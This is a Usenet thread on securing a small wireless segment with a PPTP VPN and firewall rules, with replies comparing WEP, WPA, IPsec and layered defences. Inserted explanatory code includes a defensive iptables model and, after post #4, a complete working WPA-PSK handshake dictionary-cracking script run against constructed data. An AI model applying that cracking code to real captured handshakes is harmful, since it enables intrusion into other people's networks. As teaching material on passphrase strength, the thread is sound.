#1
We are putting three Windows computers on a wireless network. We already have a wired network in place that is largely maintained by Linux routers and servers. Our primary concern is security. We don't want anyone using our wireless network to gain access to our wired network, and we want all communications across the wireless network to be secured. From what we've seen, with enough sniffing on even a WAP-secured wireless net the security can be cracked.

Our current plan is to CAT5 a Linux system with poptop to the wireless hub and have the Windows computers use M$ PPTP to securely create VPN connections into poptop. The wireless network address range would not be allowed to route (the rest of the network is on the "other" side of the Linux poptop server). Each of the Windows systems would have its firewall tightened down to only allow the PPTP traffic to and from the poptop server; all other traffic on the wireless network would be blocked. The same goes for the poptop server. Thus the only network that would offer access to the Windows systems would be the VPN net riding on the PPTP.

I did a quick Google and came up with this link where it has already been done: http://www.schumann.cx/wavelan/

I'm just wondering if you guys (who have much more experience than I) have done anything similar and if so what your experience and recommendations are.

Thanks!

/dev/null
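The filtering design in the post above (wireless segment may talk to the VPN server only on the PPTP control port and GRE, tunnel traffic is routed to the wired LAN, the raw wireless subnet is never forwarded) expressed as an added example. This is not the poster's configuration nor anything from the linked page: the interface names (eth1 wireless, eth0 wired, ppp+ for the per-client tunnel interfaces pppd creates), the addresses, and the rule that trusts the wired side for management are assumptions. The block models the rules as data, evaluates packets against them first-match-wins the way netfilter does, and renders the same rules as iptables commands. Note that the filter keys on the ingress interface, not the source address, so a wireless client that spoofs a VPN-subnet address still falls into the wireless DROP rule. The design is independent of the tunnel protocol, which matters because PPTP's MS-CHAPv2 authentication and the MPPE keys derived from it have since been shown to be breakable; the same rules with an IPsec or other modern VPN in place of TCP/1723 and GRE are what a practitioner would deploy today.

```python
"""Packet-filter model of the 'VPN-only wireless segment' design.

Constructed example: interface names and addresses are assumptions, not
values from the thread.  eth1 faces the wireless segment, eth0 the wired
LAN, and ppp+ are the PPTP tunnel interfaces pppd creates per client.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional

WLAN_IF, WIRED_IF, VPN_IF = "eth1", "eth0", "ppp+"   # assumed interface names
VPN_SERVER = "192.168.200.1"                         # assumed server address on the wireless side
PPTP_PORT = 1723                                     # PPTP control channel (RFC 2637)


@dataclass(frozen=True)
class Packet:
    chain: str                 # "INPUT" (to this host) or "FORWARD" (through it)
    in_if: str
    src: str
    dst: str
    proto: str                 # "tcp", "udp", "gre", "icmp"
    out_if: Optional[str] = None
    dport: Optional[int] = None
    state: str = "NEW"         # conntrack state: "NEW" or "ESTABLISHED"


def _iface_match(pattern: str, name: str) -> bool:
    # iptables semantics: a trailing '+' is a prefix wildcard (ppp+ matches ppp0, ppp1, ...)
    if pattern.endswith("+"):
        return name.startswith(pattern[:-1])
    return pattern == name


@dataclass(frozen=True)
class Rule:
    chain: str
    target: str                # "ACCEPT" or "DROP"
    in_if: Optional[str] = None
    out_if: Optional[str] = None
    dst: Optional[str] = None
    proto: Optional[str] = None
    dport: Optional[int] = None
    state: Optional[str] = None

    def matches(self, p: Packet) -> bool:
        if self.chain != p.chain:
            return False
        if self.in_if and not _iface_match(self.in_if, p.in_if):
            return False
        if self.out_if and not _iface_match(self.out_if, p.out_if or ""):
            return False
        if self.dst and ip_address(p.dst) not in ip_network(self.dst):
            return False
        if self.proto and self.proto != p.proto:
            return False
        if self.dport is not None and self.dport != p.dport:
            return False
        if self.state and self.state != p.state:
            return False
        return True

    def to_iptables(self) -> str:
        """Render the same match as an iptables command (--dport is only used with -p tcp)."""
        parts = ["iptables", "-A", self.chain]
        if self.in_if:
            parts += ["-i", self.in_if]
        if self.out_if:
            parts += ["-o", self.out_if]
        if self.proto:
            parts += ["-p", self.proto]
        if self.dst:
            parts += ["-d", self.dst]
        if self.dport is not None:
            parts += ["--dport", str(self.dport)]
        if self.state:
            parts += ["-m", "conntrack", "--ctstate", self.state]
        return " ".join(parts + ["-j", self.target])


# First match wins; anything unmatched falls through to the chain policy (DROP).
RULES: List[Rule] = [
    # Wireless clients may reach this host only to set up PPTP: TCP/1723 plus GRE (IP proto 47).
    Rule("INPUT", "ACCEPT", in_if=WLAN_IF, proto="tcp", dst=VPN_SERVER, dport=PPTP_PORT),
    Rule("INPUT", "ACCEPT", in_if=WLAN_IF, proto="gre", dst=VPN_SERVER),
    # Traffic arriving inside a tunnel comes from an authenticated VPN peer.
    Rule("INPUT", "ACCEPT", in_if=VPN_IF),
    # Assumption: the wired side is trusted for managing the server.
    Rule("INPUT", "ACCEPT", in_if=WIRED_IF),
    Rule("INPUT", "DROP", in_if=WLAN_IF),
    # Only tunnel traffic is routed to the wired LAN; replies are allowed back into the tunnel.
    Rule("FORWARD", "ACCEPT", in_if=VPN_IF, out_if=WIRED_IF),
    Rule("FORWARD", "ACCEPT", in_if=WIRED_IF, out_if=VPN_IF, state="ESTABLISHED"),
    # The raw wireless subnet is never forwarded, in either direction.
    Rule("FORWARD", "DROP", in_if=WLAN_IF),
    Rule("FORWARD", "DROP", out_if=WLAN_IF),
]


def verdict(p: Packet, rules: List[Rule] = RULES, policy: str = "DROP") -> str:
    """Return the target of the first matching rule, or the chain policy."""
    for r in rules:
        if r.matches(p):
            return r.target
    return policy


def render_script(rules: List[Rule] = RULES) -> str:
    """The equivalent iptables commands, default-deny on both chains."""
    head = ["iptables -P INPUT DROP", "iptables -P FORWARD DROP",
            "iptables -A INPUT -i lo -j ACCEPT"]
    return "\n".join(head + [r.to_iptables() for r in rules])


if __name__ == "__main__":
    print(render_script())
```

Run it to print the rule script; the same `verdict()` function can be fed candidate packets to check the policy before it is loaded on a real box. The Windows clients' own firewalls need the mirror image: allow TCP/1723 and GRE to the server's wireless address, drop everything else on the wireless adapter.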

#2

I've considered doing a similar thing, but APs supporting 152-bit WEP with TKIP and 802.1x security seem like so much less trouble. Aren't they virtually uncrackable? I know 64-bit WEP is a joke.

#3

The approach I took is similar... instead of PPTP I used IPSec, but anyway the concept is the same. I use ASL (www.astaro.com) as the Linux IPSec (or PPTP or L2TP) server.

Regards,
Fidelio

"/dev/null" <(E-Mail Removed)> wrote in message news:FApFd.3845$P04.520@attbi_s03...
> We are putting three windows computers on a wireless network. We already
> have a wired network in place that is largely maintained by linux routers
> and servers. Our primary concern is the security. We don't want anyone
> using our wireless network to gain access to our wired network and we want
> all communications across the wireless network to be secured. From what
> we've seen, enough sniffing on even a WAP secured wireless net and the
> security can be cracked.
>
> Our current plan is to CAT5 a linux system with poptop to the wireless hub
> and have the windows computers use m$ ppptp to securely create vpn
> connections into poptop. The wireless network address range would not be
> allowed to route (the rest of the network is on the "other" side of the
> linux poptop server). Each of the windows systems would have their
> firewalls tightened down to only allow the ppptp traffic to and from the
> poptop server, all other traffic on the wireless network would be blocked.
> The same goes for the poptop server. Thus the only network that would offer
> access to the windows systems would be the vpn net riding on the ppptp.
>
> I did a quick google and came up with this link where it has already been
> done: http://www.schumann.cx/wavelan/
>
> I'm just wondering if you guys (which have much more experience than I) have
> done anything similar and if so what your experience and recommendations
> are.
>
> Thanks!

#4

Taking a moment's reflection, /dev/null mused:
> From what we've seen, enough sniffing on even a WAP secured wireless net
> and the security can be cracked.

You may be mixing up your terms. WAP stands for Wireless Access Point, and is the physical hardware that wireless clients connect to. This can be secured with WEP or WPA encryption methods. WEP is the weaker of the two, and with enough packets sniffed can be cracked easily. WPA, however, fixes this vulnerability and is infinitely more secure. WPA is, technically, still vulnerable to dictionary-based attacks (where someone attempts to guess the passphrase), but a long and nonsensical passphrase will generally protect from these attacks. In other words, don't use "pencil" as your passphrase. ;-)
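The dictionary attack on WPA-PSK mentioned above, worked through as an added example (not code from anyone in the thread). The SSID, MAC addresses, nonces and EAPOL frame bytes below are constructed test data, not a real capture, and the wordlist is a toy. The block implements the standard WPA/WPA2-PSK key schedule: the passphrase and SSID go through PBKDF2-HMAC-SHA1 (4096 iterations) to give the PMK, the PMK plus both MAC addresses and both handshake nonces go through the 802.11i PRF to give the PTK, and the first 128 bits of the PTK (the KCK) key the MIC on message 2 of the 4-way handshake. Everything except the passphrase is broadcast or sent in the clear during the handshake, so an attacker who sniffs one handshake can test candidates offline at the cost of one PBKDF2 each; the only defence is passphrase entropy, which is the point the post is making.

```python
"""Offline dictionary attack against a captured WPA/WPA2-PSK 4-way handshake.

Constructed example: the SSID, MAC addresses, nonces and EAPOL frame below are
made-up test data, not a real capture.  It shows why the passphrase is the only
secret in WPA-PSK: the SSID is the PBKDF2 salt and is broadcast, and every other
input to the key schedule and MIC is visible in the handshake.
"""
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # IEEE 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    # Passphrases are 8 to 63 printable ASCII characters.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || counter), counter = 0..3
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # AA = authenticator (AP) MAC, SPA = supplicant (client) MAC; both pairs are ordered by value.
    # PRF-512 yields 64 bytes; CCMP uses the first 48, TKIP all 64.  KCK is always the first 16.
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_frame: bytes, wpa2: bool = True) -> bytes:
    # Key MIC over the EAPOL-Key frame with its MIC field zeroed:
    # WPA2/CCMP uses HMAC-SHA1 truncated to 128 bits, WPA/TKIP uses HMAC-MD5.
    if wpa2:
        return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]
    return hmac.new(kck, eapol_frame, hashlib.md5).digest()


@dataclass(frozen=True)
class Handshake:
    ssid: str
    aa: bytes
    spa: bytes
    anonce: bytes
    snonce: bytes
    eapol2: bytes      # message 2 of the 4-way handshake, MIC field zeroed
    mic: bytes         # the MIC the client actually sent in message 2


def simulate_capture(passphrase: str, ssid: str = "TestLAN") -> Handshake:
    """Play AP and client so there is a handshake to attack (all values constructed)."""
    aa = bytes.fromhex("001122334455")                  # assumed AP MAC
    spa = bytes.fromhex("66778899aabb")                 # assumed client MAC
    anonce = hashlib.sha256(b"anonce-demo").digest()    # fixed so the example is reproducible
    snonce = hashlib.sha256(b"snonce-demo").digest()
    # Stand-in EAPOL-Key frame bytes; only its role as MIC input matters here.
    eapol2 = b"\x02\x03\x00\x75\x02\x01\x0a\x00" + snonce + b"\x00" * 60
    ptk = derive_ptk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)
    kck = ptk[:16]
    return Handshake(ssid, aa, spa, anonce, snonce, eapol2, eapol_mic(kck, eapol2))


def crack(hs: Handshake, wordlist: Iterable[str]) -> Optional[str]:
    """One PBKDF2 (4096 HMAC-SHA1 rounds) per candidate; a matching MIC confirms the guess."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, hs.ssid)
        kck = derive_ptk(pmk, hs.aa, hs.spa, hs.anonce, hs.snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, hs.eapol2), hs.mic):
            return candidate
    return None


# Constructed toy wordlist; real attacks use lists of millions of common passphrases.
WORDLIST = ["password", "pencil01", "linksys1", "letmein1", "wireless", "12345678"]

if __name__ == "__main__":
    print("weak passphrase recovered:", crack(simulate_capture("pencil01"), WORDLIST))
    print("strong passphrase recovered:",
          crack(simulate_capture("crumpled-gyroscope-ovation-lantern-77"), WORDLIST))
```

The 4096-round PBKDF2 is what makes each guess cost something, but it only slows the attacker linearly; a passphrase drawn from a wordlist falls in seconds, while one with enough entropy is out of reach no matter how long the capture is kept. Note also that the SSID is the salt, so a common SSID lets precomputed tables be reused across networks.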

#5

"mhicaoidh" <®êmõvé_mhic_aoidh@hotÑîXmailŠPäM.com> wrote in message news:51yFd.4284$OF5.1420@attbi_s52...
> Taking a moment's reflection, /dev/null mused:
> > From what we've seen, enough sniffing on even a WAP secured wireless net
> > and the security can be cracked.
>
> You may be mixing up your terms. WAP stands for Wireless Access Point,
> and is the physical hardware that wireless clients connect to. This can be
> secured with WEP or WPA encryption methods.

Sorry, 'WAP' was a typo; I meant WPA. Thanks for catching that.

#6

/dev/null wrote:
> I'm just wondering if you guys (which have much more experience than I)
> have done anything similar and if so what your experience and
> recommendations are.

I have my wireless network connected to my firewall system, on its own NIC, so that it's outside of my firewall. The only way in is to use ssh or VPN. I also use WEP for an added layer of protection.

#7

mhicaoidh wrote:
> You may be mixing up your terms. WAP stands for Wireless Access Point,
> and is the physical hardware that wireless clients connect to. This can be
> secured with WEP or WPA encryption methods. WEP is the weaker of the two,
> and with enough packets sniffed can be cracked easily. WPA, however, fixes
> this vulnerability and is infinitely more secure. WPA is, technically,
> still vulnerable to dictionary based attacks (where someone attempts to
> guess the passphrase), but a long and nonsensical passphrase will generally
> protect from these attacks. In other words, don't use "pencil" as your
> passphrase. ;-)

For a second layer of security you can use a TLS tunnel with a FreeRADIUS server to authenticate Windows XP supplicants or Xsupplicant daemons on Linux.

--
Jose Maria Lopez Hernandez
Director Tecnico de bgSEC
(E-Mail Removed)
bgSEC Seguridad y Consultoria de Sistemas Informaticos
http://www.bgsec.com
ESPAÑA

The only people for me are the mad ones -- the ones who are mad to live, mad to talk, mad to be saved, desirous of everything at the same time, the ones who never yawn or say a commonplace thing, but burn, burn, burn like fabulous yellow Roman candles.
-- Jack Kerouac, "On the Road"

#8

James Knott wrote:
> I have my wireless network connected to my firewall system, on it's own NIC,
> so that it's outside of my firewall. The only way in, is to use ssh or
> vpn. I also use WEP for an added layer of protection.

WEP is easily breakable. Firewalls can be fooled, and ssh is vulnerable to dictionary attacks. And I am very pessimistic, I know :-)

--
Jose Maria Lopez Hernandez
Director Tecnico de bgSEC
bgSEC Seguridad y Consultoria de Sistemas Informaticos
http://www.bgsec.com
ESPAÑA

#9

Jose Maria Lopez Hernandez wrote:
> James Knott wrote:
> > I have my wireless network connected to my firewall system, on it's own
> > NIC, so that it's outside of my firewall. The only way in, is to use ssh or
> > vpn. I also use WEP for an added layer of protection.
>
> WEP is easily breakable. Firewalls can be fooled, and ssh it's
> vulnerable to dictionary attacks. And I am very pessimistic, I know :-)

Security is never absolute. You add layers in order to make it too difficult for an attacker. WEP will stop the casual intruder. The more determined must then break the VPN or ssh. If they manage to do that, they still have to find a way to get root access, etc.

#10

> Security is never absolute. You add layers, in order to make it too
> difficult for an attacker.

I totally agree.

> WEP will stop the casual intruder. The more
> determined must then break the vpn or ssh.
> If they manage to do that, they
> still have to find a way to get root access etc.

Not for our stuff. The data being transmitted itself is the "prize jewel" that must be protected. If they can sniff the decrypted real data then we're in trouble. Of course I don't want them in the box either, but the data being transmitted is our first concern, and they will be able to see the data long before they are ever able to get root. So if we stop them from seeing the data...